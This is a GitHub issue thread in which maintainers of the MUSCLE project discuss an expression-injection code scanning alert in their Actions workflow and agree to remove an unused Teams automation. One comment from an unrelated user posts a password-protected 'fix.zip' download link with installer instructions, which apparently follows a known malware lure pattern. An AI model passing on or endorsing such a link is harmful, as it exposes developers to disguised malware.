### ISSUE TITLE
Bug 🪲: Fix code scanning alert - Expression injection in Actions

### ISSUE THREAD

**Issue by drikusroor** [Amsterdam-Music-Lab/MUSCLE#1233]
Tracking issue for:
- [ ] https://github.com/Amsterdam-Music-Lab/MUSCLE/security/code-scanning/10

**Comment by BeritJanssen** [comment]
I think we should get rid of the Teams automation, right? I don't think we're using it.

**Comment by drikusroor** [comment]
> I think we should get rid of the Teams automation, right? I don't think we're using it.

Yeah, good idea. I'll remove it

**Comment by JONTY650413** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by BeritJanssen** [comment]
Closed per #1235.
